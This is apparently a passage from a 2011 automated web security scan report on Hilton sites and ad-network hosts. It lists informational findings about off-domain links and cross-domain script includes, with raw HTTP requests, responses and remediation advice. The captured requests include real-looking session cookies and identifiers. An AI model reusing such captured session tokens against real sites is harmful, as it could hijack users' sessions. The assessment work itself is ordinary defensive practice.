                                                                                                       <a href="http://www.hiltonworldwide.com/development/index.htm">
                                                       Franchise Development
                                                   </a>
...[SNIP]...
<li>
                                                   
                                                   
                                                                                                       <a href="http://www.hiltonglobalmediacenter.com/">
                                                       Press &amp; Media
                                                   </a>
...[SNIP]...
<li><a href="http://www.hilton.de/SiteHomePage">Germany</a>
...[SNIP]...
<NOSCRIPT>
<IMG ALT="" BORDER="0" NAME="DCSIMG" WIDTH="1" HEIGHT="1" SRC="http://statse.webtrendslive.com/dcsserqb8erp17368wkcsn8pc_2z2f/njs.gif?dcsuri=/nojavascript&amp;WT.js=No">
</NOSCRIPT>
...[SNIP]...
<NOSCRIPT>
<IMG ALT="" BORDER="0" NAME="DCSIMG" WIDTH="1" HEIGHT="1" SRC="http://statse.webtrendslive.com/dcsserqb8erp17368wkcsn8pc_2z2f/njs.gif?dcsuri=/nojavascript&amp;WT.js=No">
</NOSCRIPT>
...[SNIP]...
17.58. http://www1.hilton.com/en_US/hi/index.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/index.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /en_US/hi/index.do?WT.mc_id=zWHDD0US1HH2OLG4IEPin7BR840644 HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:03:13 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cross-sell=hi; Domain=hilton.com; Path=/
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:14:13 GMT;path=/
Content-Length: 57658


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta name="msapplication-st
...[SNIP]...
<noscript>
           <iframe src="http://fls.doubleclick.net/activityi;src=2013561;type=hilto339;cat=hilto778;ord=1?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...
<noscript>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" width="550" height="289">
<div id="flashAlt">
...[SNIP]...
<span>
                       <a href="http://hiltonplus.flexrez.com/wcsMain.asp?plf=hltn" target="_blank">Hotel + Air + Car Reservation</a><br />
                       <a href="http://hilton.flexrez.com/travel/airlines/lang/en-us/status/default.asp?refid=PAHILTON&plf=hltn" target="_blank">Air Itinerary</a> | <a href="http://secure.rezserver.com/car/help/review/?refid=2683" target="_blank">Car Rental Details</a>
...[SNIP]...
<div id="newsalert1">You are viewing a static version of this content. In order to see an animated version, <a href="http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash" target="_blank">download</a>
...[SNIP]...
<li><a href="https://www201.americanexpress.com/cards/Applyfservlet?csi=4/13856/b/61/2923115344/29215343785/0/n">Earn Up To 20K HHonors Points</a>
...[SNIP]...
<li><a href="http://www.hiltongrandvacations.com/vacation-ownership-intro.php">Hilton Grand Vacations</a>
...[SNIP]...
<noscript>
<object
   classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"
   codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0"
   width="385"
   height="70"
   id="rotator_v1"
   align="middle">
   <div id="flashAlt">
...[SNIP]...
<li class="brandBarLi brandBarLi_WA" id="brandBarLi_WA"><a class="brandBarLiA" onmouseover="turnOnPopup('brandBarLi_WA');" onmouseout="turnOffPopup('brandBarLi_WA');" href="http://www.waldorfastoria.com"><span>
...[SNIP]...
<li class="brandBarLi brandBarLi_HV" id="brandBarLi_HV"><a class="brandBarLiA" onmouseover="turnOnPopup('brandBarLi_HV');" onmouseout="turnOffPopup('brandBarLi_HV');" href="http://www.hiltongrandvacations.com/index.php"><span>
...[SNIP]...
<li>
                                                   
                                                   <a href="http://assistive.usablenet.com/tt/referrer">
                                                       View Text Only
                                                   </a>
...[SNIP]...
<li>
                                                   
                                                   
                                                                                                       <a href="http://www.hiltonworldwide.com">
                                                       Hilton Worldwide
                                                   </a>
...[SNIP]...
<li>
                                                   
                                                   
                                                                                                       <a href="http://www.hiltonworldwide.com/careers/index.htm">
                                                       Careers
                                                   </a>
...[SNIP]...
<li>
                                                   
                                                   
                                                                                                       <a href="http://www.hiltonworldwide.com/development/index.htm">
                                                       Franchise Development
                                                   </a>
...[SNIP]...
<li>
                                                   
                                                   
                                                                                                       <a href="http://www.hiltonglobalmediacenter.com/">
                                                       Press &amp; Media
                                                   </a>
...[SNIP]...
<li><a href="http://www.hilton.de/SiteHomePage">Germany</a>
...[SNIP]...
<NOSCRIPT>
<IMG ALT="" BORDER="0" NAME="DCSIMG" WIDTH="1" HEIGHT="1" SRC="http://statse.webtrendslive.com/dcsserqb8erp17368wkcsn8pc_2z2f/njs.gif?dcsuri=/nojavascript&amp;WT.js=No">
</NOSCRIPT>
...[SNIP]...
<NOSCRIPT>
<IMG ALT="" BORDER="0" NAME="DCSIMG" WIDTH="1" HEIGHT="1" SRC="http://statse.webtrendslive.com/dcsserqb8erp17368wkcsn8pc_2z2f/njs.gif?dcsuri=/nojavascript&amp;WT.js=No">
</NOSCRIPT>
...[SNIP]...
17.59. http://www1.hilton.com/en_US/hi/sitemap/index.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/sitemap/index.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /en_US/hi/sitemap/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:04:10 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=1907DCB21C07B2421366C003D9FC39EA.etc62; Path=/
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:15:10 GMT;path=/
Content-Length: 37911


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta name="m
...[SNIP]...
<li>
                       
                       <a href="http://hiltonplus.flexrez.com/vacations/lang/en-us/vacations.asp?refid=pahilton&refclickid=hispoffer" target="_blank"> Hotel+Air+Car
                       </a>
...[SNIP]...
<li>
                       
                       
                                                                                                                                                                                                                                                                                                                           <a href="http://www.hiltonmeetings.com/global/rfp/shortrfp.asp" target="_blank">
                       Request For Proposal
                       </a>
...[SNIP]...
<li>
                           
                           <a href="http://phx.corporate-ir.net/phoenix.zhtml?c=88577&p=irol-irhome" target="_blank">
                               Investor Relations
                           </a>
...[SNIP]...
<li class="brandBarLi brandBarLi_WA" id="brandBarLi_WA"><a class="brandBarLiA" onmouseover="turnOnPopup('brandBarLi_WA');" onmouseout="turnOffPopup('brandBarLi_WA');" href="http://www.waldorfastoria.com"><span>
...[SNIP]...
<li class="brandBarLi brandBarLi_HV" id="brandBarLi_HV"><a class="brandBarLiA" onmouseover="turnOnPopup('brandBarLi_HV');" onmouseout="turnOffPopup('brandBarLi_HV');" href="http://www.hiltongrandvacations.com/index.php"><span>
...[SNIP]...
<li>
                                                   
                                                   <a href="http://assistive.usablenet.com/tt/referrer">
                                                       View Text Only
                                                   </a>
...[SNIP]...
<li>
                                                   
                                                   
                                                                                                       <a href="http://www.hiltonworldwide.com">
                                                       Hilton Worldwide
                                                   </a>
...[SNIP]...
<li>
                                                   
                                                   
                                                                                                       <a href="http://www.hiltonworldwide.com/careers/index.htm">
                                                       Careers
                                                   </a>
...[SNIP]...
<li>
                                                   
                                                   
                                                                                                       <a href="http://www.hiltonworldwide.com/development/index.htm">
                                                       Franchise Development
                                                   </a>
...[SNIP]...
<li>
                                                   
                                                   
                                                                                                       <a href="http://www.hiltonglobalmediacenter.com/">
                                                       Press &amp; Media
                                                   </a>
...[SNIP]...
<li><a href="http://www.hilton.de/SiteHomePage">Germany</a>
...[SNIP]...
<NOSCRIPT>
<IMG ALT="" BORDER="0" NAME="DCSIMG" WIDTH="1" HEIGHT="1" SRC="http://statse.webtrendslive.com/dcsserqb8erp17368wkcsn8pc_2z2f/njs.gif?dcsuri=/nojavascript&amp;WT.js=No">
</NOSCRIPT>
...[SNIP]...
<NOSCRIPT>
<IMG ALT="" BORDER="0" NAME="DCSIMG" WIDTH="1" HEIGHT="1" SRC="http://statse.webtrendslive.com/dcsserqb8erp17368wkcsn8pc_2z2f/njs.gif?dcsuri=/nojavascript&amp;WT.js=No">
</NOSCRIPT>
...[SNIP]...
17.60. http://www3.hilton.com/en_US/hi/hotel/popup/accessibilityPolicy.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www3.hilton.com
Path:   /en_US/hi/hotel/popup/accessibilityPolicy.htm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /en_US/hi/hotel/popup/accessibilityPolicy.htm?ctyhocn=BOSLHHH HTTP/1.1
Host: www3.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en
X-Powered-By: Servlet/2.5 JSP/2.1
Cache-Control: max-age=86400
Expires: Tue, 04 Oct 2011 13:01:23 GMT
Content-Type: text/html; charset=UTF-8
Date: Mon, 03 Oct 2011 13:01:33 GMT
Content-Length: 7078
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
       "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<?xml version="1.0" encoding="UTF-8"?>
...[SNIP]...
<noscript>
   <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://statse.webtrendslive.com//njs.gif?dcsuri=/nojavascript&amp;WT.js=No" />
</noscript>
...[SNIP]...
17.61. http://www3.hilton.com/en_US/hi/hotel/popup/hotelDetails.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www3.hilton.com
Path:   /en_US/hi/hotel/popup/hotelDetails.htm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /en_US/hi/hotel/popup/hotelDetails.htm?ctyhocn=BOSLHHH HTTP/1.1
Host: www3.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en
X-Powered-By: Servlet/2.5 JSP/2.1
Cache-Control: max-age=86400
Expires: Tue, 04 Oct 2011 13:00:58 GMT
Content-Type: text/html; charset=UTF-8
Date: Mon, 03 Oct 2011 13:01:08 GMT
Content-Length: 13095
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
       "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<?xml version="1.0" encoding="UTF-8"?>
...[SNIP]...
<noscript>
   <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://statse.webtrendslive.com//njs.gif?dcsuri=/nojavascript&amp;WT.js=No" />
</noscript>
...[SNIP]...
17.62. http://www3.hilton.com/en_US/hi/search/findhotels/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www3.hilton.com
Path:   /en_US/hi/search/findhotels/index.htm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /en_US/hi/search/findhotels/index.htm?it=Tnav,Res HTTP/1.1
Host: www3.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Language: en
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Date: Mon, 03 Oct 2011 13:00:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44243


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
       "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<?xml version="1.0" encoding="UTF-8"?>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.hotelicopter.com/js/connector.js"></script>
...[SNIP]...
<li><a href="http://assistive.usablenet.com/tt/referrer">View Text Only</a>
...[SNIP]...
<p>


<a href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&type=GOLD&sealid=2&dn=www.hilton.com&lang=en" target="_blank" onclick="openPopup(this,'560','500','This is a Secure Site');return false;"><img src="/skins/common/img/verisign.gif" alt="This is a Secure Site" class="verisign"/>
...[SNIP]...
<li><a href="http://www.hilton.de">Germany</a>
...[SNIP]...
<noscript>
   <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://statse.webtrendslive.com/dcsx8czs1erp17368wkcsn8pc_9z2q/njs.gif?dcsuri=/nojavascript&amp;WT.js=No" />
</noscript>
...[SNIP]...
17.63. http://www3.hilton.com/en_US/hi/search/findhotels/reloadSearchResultsAjax.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www3.hilton.com
Path:   /en_US/hi/search/findhotels/reloadSearchResultsAjax.htm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /en_US/hi/search/findhotels/reloadSearchResultsAjax.htm?view=LIST&page=1&rewardBooking=true HTTP/1.1
Host: www3.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Language: en
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Date: Mon, 03 Oct 2011 13:00:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 213254


<div class="gridColOne">
   
   
           <div class="module moduleSearchFilters moduleFilters infoBoxShadow">
           <div class="infoBox">
               <div class="searchF
...[SNIP]...
<br/>
   <a href="http://www.adobe.com/go/getflashplayer"><img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash Player" border="0"/></a>
...[SNIP]...
<br/>
   <a href="http://www.adobe.com/go/getflashplayer"><img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash Player" border="0"/></a>
...[SNIP]...
<br/>
   <a href="http://www.adobe.com/go/getflashplayer"><img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash Player" border="0"/></a>
...[SNIP]...
<br/>
   <a href="http://www.adobe.com/go/getflashplayer"><img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash Player" border="0"/></a>
...[SNIP]...
<br/>
   <a href="http://www.adobe.com/go/getflashplayer"><img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash Player" border="0"/></a>
...[SNIP]...
<br/>
   <a href="http://www.adobe.com/go/getflashplayer"><img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash Player" border="0"/></a>
...[SNIP]...
<br/>
   <a href="http://www.adobe.com/go/getflashplayer"><img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash Player" border="0"/></a>
...[SNIP]...
<br/>
   <a href="http://www.adobe.com/go/getflashplayer"><img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash Player" border="0"/></a>
...[SNIP]...
<br/>
   <a href="http://www.adobe.com/go/getflashplayer"><img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash Player" border="0"/></a>
...[SNIP]...
<br/>
   <a href="http://www.adobe.com/go/getflashplayer"><img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash Player" border="0"/></a>
...[SNIP]...
<br/>
   <a href="http://www.adobe.com/go/getflashplayer"><img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash Player" border="0"/></a>
...[SNIP]...
<br/>
   <a href="http://www.adobe.com/go/getflashplayer"><img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash Player" border="0"/></a>
...[SNIP]...
17.64. http://www3.hilton.com/en_US/hi/search/findhotels/results.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www3.hilton.com
Path:   /en_US/hi/search/findhotels/results.htm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /en_US/hi/search/findhotels/results.htm?view=LIST HTTP/1.1
Host: www3.hilton.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www1.hilton.com/en_US/hi/index.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; cross-sell=hi; mmcore.tst=0.544; mmid=-839280809%7CAQAAAAodekFwyAYAAA%3D%3D; mmcore.pd=-839280809%7CAQAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrCSTO=T; ClrSSID=1317646383790-9086; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635584777:ss=1317635584777; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 257222
Date: Mon, 03 Oct 2011 12:52:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
       "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<?xml version="1.0" encoding="UTF-8"?>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.hotelicopter.com/js/connector.js"></script>
...[SNIP]...
<![if !IE]><script src="http://dev.virtualearth.net/mapcontrol/v6.3/js/atlascompat.js"></script><![endif]>

<script charset="UTF-8" type="text/javascript" src="http://ecn.dev.virtualearth.net/mapcontrol/mapcontrol.ashx?v=6.3&mkt=en-us"></script>
...[SNIP]...
<li><a href="http://assistive.usablenet.com/tt/referrer">View Text Only</a>
...[SNIP]...
<br/>
   <a href="http://www.adobe.com/go/getflashplayer"><img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash Player" border="0"/></a>
...[SNIP]...
<br/>
   <a href="http://www.adobe.com/go/getflashplayer"><img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash Player" border="0"/></a>
...[SNIP]...
<br/>
   <a href="http://www.adobe.com/go/getflashplayer"><img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash Player" border="0"/></a>
...[SNIP]...
<br/>
   <a href="http://www.adobe.com/go/getflashplayer"><img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash Player" border="0"/></a>
...[SNIP]...
<br/>
   <a href="http://www.adobe.com/go/getflashplayer"><img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash Player" border="0"/></a>
...[SNIP]...
<br/>
   <a href="http://www.adobe.com/go/getflashplayer"><img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash Player" border="0"/></a>
...[SNIP]...
<br/>
   <a href="http://www.adobe.com/go/getflashplayer"><img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash Player" border="0"/></a>
...[SNIP]...
<br/>
   <a href="http://www.adobe.com/go/getflashplayer"><img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash Player" border="0"/></a>
...[SNIP]...
<br/>
   <a href="http://www.adobe.com/go/getflashplayer"><img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash Player" border="0"/></a>
...[SNIP]...
<br/>
   <a href="http://www.adobe.com/go/getflashplayer"><img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash Player" border="0"/></a>
...[SNIP]...
<br/>
   <a href="http://www.adobe.com/go/getflashplayer"><img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash Player" border="0"/></a>
...[SNIP]...
<br/>
   <a href="http://www.adobe.com/go/getflashplayer"><img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash Player" border="0"/></a>
...[SNIP]...
</span>
                   
                   
<a href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&type=GOLD&sealid=2&dn=www.hilton.com&lang=en" target="_blank" onclick="openPopup(this,'560','500','This is a Secure Site');return false;"><img src="/skins/common/img/verisign.gif" alt="This is a Secure Site" class="verisign_logo"/>
...[SNIP]...
<li><a href="http://www.hilton.de">Germany</a>
...[SNIP]...
<NOSCRIPT>
   <IFRAME SRC="https://fls.doubleclick.net/activityi;src=2013561;type=globa822;cat=gwr1s321;u4=1;u5=1;u9=10/03/2011;u10=;u11=US;ord=1?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
...[SNIP]...
<noscript>
   <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://statse.webtrendslive.com/dcsx8czs1erp17368wkcsn8pc_9z2q/njs.gif?dcsuri=/nojavascript&amp;WT.js=No" />
</noscript>
...[SNIP]...
17.65. http://www3.hilton.com/en_US/wa/doxch.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www3.hilton.com
Path:   /en_US/wa/doxch.htm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /en_US/wa/doxch.htm?dst=http://PFS-WA/ HTTP/1.1
Host: www3.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Location: http://waldorfastoria.com/;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041801034,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&
X-Powered-By: Servlet/2.5 JSP/2.1
Cache-Control: max-age=86400
Expires: Tue, 04 Oct 2011 13:02:02 GMT
Content-Type: text/html
Date: Mon, 03 Oct 2011 13:02:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 549

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://waldorfastoria.com/&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041801034,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&amp;">http://waldorfastoria.com/&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041801034,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&amp;</a>
...[SNIP]...
18. Cross-domain script include  previous  next
There are 68 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

18.1. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /activityi;src=2010860;type=2010c219;cat=fl_ho038;ord=5806069097016.007? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.celebritycruises.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 03 Oct 2011 12:47:03 GMT
Expires: Mon, 03 Oct 2011 12:47:03 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 2816
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><script type="text/j
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<IMG SRC="http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_2011rfpcelebritycruises/Retargeting_Homepage_Nonsecure@Bottom3"><script src="http://action.media6degrees.com/orbserv/hbjs?pixId=4305&pcv=30" type="text/javascript"></script>
...[SNIP]...
18.2. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /activityi;src=2013561;type=hilto339;cat=hilto778;ord=9654915034770.965? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www1.hilton.com/en_US/hi/index.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 03 Oct 2011 12:52:42 GMT
Expires: Mon, 03 Oct 2011 12:52:42 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 1239
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="http://ads
...[SNIP]...
</div><script src="http://ib.adnxs.com/seg?add=178503&t=1" type="text/javascript"></script><script src="http://segment-pixel.invitemedia.com/pixel?pixelID=65630&partnerID=152&key=segment&returnType=js"></script>
...[SNIP]...
18.3. http://oasc18005.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.opentable.opt/home/1225001877@Middle1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc18005.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.opentable.opt/home/1225001877@Middle1

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_mjx.ads/www.opentable.opt/home/1225001877@Middle1? HTTP/1.1
Host: oasc18005.247realmedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/adpanelcontent247.aspx?m=0&page=home_aspx&pagetype=HOME&adtype=BIGBOX
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5i4akACMfX; NXCLICK2=011RAUw5NX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 14:21:32 GMT
Server: Apache/2.2.3 (Red Hat)
